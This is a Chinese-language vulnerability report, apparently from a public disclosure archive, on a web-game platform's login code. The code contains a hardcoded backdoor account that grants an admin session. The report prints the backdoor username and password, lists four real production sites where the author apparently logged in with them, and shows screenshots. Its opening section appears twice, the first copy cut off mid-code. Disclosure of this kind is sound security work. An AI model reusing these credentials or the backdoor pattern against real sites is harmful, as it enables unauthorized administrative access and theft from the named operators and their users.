### 简要描述: 代码级的后门账户。做网页游戏收入还可以啊…… ### 详细说明: 可能为测试用代码,未去掉,大部分商业用户的站点现在还可利用。而且如果是直接使用免费版的肯定是还没有改的。 ### 漏洞证明: 先看Api/sys/login.ashx这个文件: ``` context.Response.ContentType = "text/plain"; var _form_ = context.Request.Form; var uid = _form_["uid"]; var pwd = _form_["pwd"]; var rem = _form_["rem"]; if (uid=="") { context.Response.Write("请输入用户名"); return; } if (pwd == "") { context.Response.Write("请输入密码"); return; } DataManage.UserEng ueng = new DataManage.UserEng(); var t = ueng.Login(uid, pwd, rem.ToLower() == "true"); //UserEng类的Login方法就是用来登录的 ``` 再跟进到UserEng.Login ``` public UserLogin Login(string uid, string upwd, bool rem) { UserLogin result; if (uid == "apwmaster_D7" && upwd == "apwmaster_d7") //后门账户的用户名、密码!!! { IList<Apw_User> all = this.dataserver.GetAll<Apw_User>(EngSql.Ene("userlogin", "'" + uid + "'")); if (all.Count < 1) { IList<Apw_User> all2 = this.dataserver.GetAll<Apw_User>("select * from Apw_User where u_GroupID in (select ID from SU_Group where gp_Key like '%sys_security%'...
### 简要描述: 代码级的后门账户。做网页游戏收入还可以啊…… ### 详细说明: 可能为测试用代码,未去掉,大部分商业用户的站点现在还可利用。而且如果是直接使用免费版的肯定是还没有改的。 ### 漏洞证明: 先看Api/sys/login.ashx这个文件: ``` context.Response.ContentType = "text/plain"; var _form_ = context.Request.Form; var uid = _form_["uid"]; var pwd = _form_["pwd"]; var rem = _form_["rem"]; if (uid=="") { context.Response.Write("请输入用户名"); return; } if (pwd == "") { context.Response.Write("请输入密码"); return; } DataManage.UserEng ueng = new DataManage.UserEng(); var t = ueng.Login(uid, pwd, rem.ToLower() == "true"); //UserEng类的Login方法就是用来登录的 ``` 再跟进到UserEng.Login ``` public UserLogin Login(string uid, string upwd, bool rem) { UserLogin result; if (uid == "apwmaster_D7" && upwd == "apwmaster_d7") //后门账户的用户名、密码!!! { IList<Apw_User> all = this.dataserver.GetAll<Apw_User>(EngSql.Ene("userlogin", "'" + uid + "'")); if (all.Count < 1) { IList<Apw_User> all2 = this.dataserver.GetAll<Apw_User>("select * from Apw_User where u_GroupID in (select ID from SU_Group where gp_Key like '%sys_security%' and gp_Key like '%login_boss%')"); if (all2.Count < 1) { result = UserLogin.NoUser; return result; } Apw_User apw_User = all2[0]; string strString = string.Concat(new object[] { apw_User.u_Account, "$", apw_User.u_RealName, "$", apw_User.u_Text, "$", apw_User.ID }); string strValue = Utility.Encrypt3DES(strString, UserEng.lizablePwd); Utility.SetCookie(UserEng.lizableName, strValue, 3); result = UserLogin.OK; return result; } } ``` if (uid == "apwmaster_D7" && upwd == "apwmaster_d7") 这句很明显了,根据后面的代码可以看出已经分配cookie了,所以肯定是后门账户 apwmaster_D7/ apwmaster_d7 测试一些官方给的案例(案例列表 http://52xinyou.cn/anli.htm ) http://www.12wan.com/account/default.aspx [<img src="https://images.seebug.org/upload/201401/121531189146279b149b741c293295255f7f7026.png" alt="image011.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/121531189146279b149b741c293295255f7f7026.png) http://www.ailiuwa.com/account/default.aspx [<img src="https://images.seebug.org/upload/201401/12153236bccf0cbfebbe6f9f86c0148a0beb6730.png" alt="image013.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/12153236bccf0cbfebbe6f9f86c0148a0beb6730.png) http://www.teiyi.com/account/default.aspx [<img src="https://images.seebug.org/upload/201401/12153308bd671f759fea92327a2273753ea5c0f9.png" alt="image015.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/12153308bd671f759fea92327a2273753ea5c0f9.png) http://www.515you.com/account/default.aspx [<img src="https://images.seebug.org/upload/201401/12153330b83268ed13aa3d4393054282665ea1b4.png" alt="image017.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/12153330b83268ed13aa3d4393054282665ea1b4.png) 再放几个图,搞网页游戏收入还可以啊!所以安全工作还是要做到位啊 [<img src="https://images.seebug.org/upload/201401/121533582a552fd7fe2dc8d046956d2294ca562a.png" alt="image019.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/121533582a552fd7fe2dc8d046956d2294ca562a.png) [<img src="https://images.seebug.org/upload/201401/12153409957b09a842ed56cce54b088d7df25647.png" alt="image021.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/12153409957b09a842ed56cce54b088d7df25647.png)
